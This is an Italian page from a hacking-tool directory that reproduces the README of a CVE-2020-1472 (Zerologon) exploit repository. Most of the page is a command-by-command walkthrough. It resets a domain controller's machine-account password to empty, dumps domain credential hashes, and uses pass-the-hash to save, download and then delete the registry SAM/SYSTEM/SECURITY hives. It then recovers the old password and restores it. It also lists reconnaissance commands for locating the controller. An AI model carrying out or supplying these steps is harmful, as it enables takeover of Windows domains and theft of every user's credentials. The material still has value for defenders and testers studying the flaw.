Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/shanfenglan/cve-2020-1472
Escalation di PrivilegiAttacchi alle PasswordAnalisi delle VulnerabilitàExploitMovimento LateralePenetration Testing
GitHubshanfenglan/cve-2020-1472

cve-2020-1472

Exploit per CVE-2020-1472 (Zerologon) che reimposta la password dell'account macchina del controller di dominio, consentendo il dump delle credenziali e l'escalation dei privilegi ad amministratore di dominio.

Vedi Repository
245 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

cve-2020-1472

@toc

Principio della vulnerabilità

Il principio è piuttosto complesso; se siete interessati, potete consultare l'articolo al seguente link: https://www.freebuf.com/articles/system/249860.html

Sfruttamento

1. Modificare il file impacket.dcerpc.v5.nrpc

È necessario utilizzare il file https://github.com/SecureAuthCorp/impacket/edit/master/impacket/dcerpc/v5/nrpc.py per sostituire il file nrpc sulla macchina locale. Il percorso di archiviazione del file nrpc locale è: C:\Users\Administrator\AppData\Local\Programs\Python\Python38\Lib\site-packages\impacket\dcerpc\v5\nrpc.py

2. Azzerare la password dell'account macchina yukong$

python cve-2020-1472-exploit.py 机器账户名 ip Inserisci qui la descrizione dell'immagine E si scopre che la password dell'account macchina è già stata azzerata; 31dc... rappresenta la password vuota. Inserisci qui la descrizione dell'immagine

Modalità per ottenere l'account macchina della controparte, o meglio il nome NetBIOS:

  1. net view Questo nome del server, con l'aggiunta di $, è il nome della macchina, ad esempio lisi$ oppure yukong$.
  1. nbtstat -A ip Inserisci qui la descrizione dell'immagine I modi per determinare l'IP del domain controller sono molti, ad esempio:
  2. Controllare gli host con la porta 53 aperta
  3. net time: l'output restituisce il nome host del domain controller; a questo punto basta un ping
  4. Con il comando systeminfo si osserva il valore relativo al dominio; un ping e si ottiene l'IP del domain controller
  5. Controllare il DNS del proprio host

3. Leggere la password di administrator

python secretsdump.py test.com/[email protected] -no-pass Inserisci qui la descrizione dell'immagine Si scopre che a questo punto è possibile usare l'account macchina con password vuota per leggere gli hash degli utenti sul domain controller.

4. Scaricare il file SAM del target per preparare il ripristino della password della macchina

root@kitploit:~
python wmiexec.py -hashes :3dbde697d71690a769204beb12283678 test/[email protected]
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

get system.save
get sam.save
get security.save

del /f system.save
del /f sam.save
del /f security.save

exit

Inserisci qui la descrizione dell'immagine Al termine dell'esecuzione, è possibile trovare i file scaricati nella cartella in cui si trova lo script wmiexec: Inserisci qui la descrizione dell'immagine

python secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 test.com/[email protected] -use-vss L'esecuzione di questo comando fallisce.

5. Decifrare il file SAM per visualizzare la vecchia password della macchina

python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL Inserisci qui la descrizione dell'immagine Salvare la password evidenziata nel cerchio rosso: questa è la vecchia password della macchina, vale a dire aad3b435b51404eeaad3b435b51404ee:999699ceadecae87fef9a2040ef2213a.

6. Ripristinare la password dell'account macchina yukong$

python reinstall_original_pw.py yukong$ 192.168.124.142 999699ceadecae87fef9a2040ef2213a Inserisci qui la descrizione dell'immagine

7. Verificare se la password è stata ripristinata con successo

root@kitploit:~
python secretsdump.py test.com/administrator:[email protected] -just-dc-user yukong$
python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678 test/[email protected] -just-dc-user yukong$

Inserisci qui la descrizione dell'immagine Si scopre che il ripristino è riuscito.

Scarica lo strumento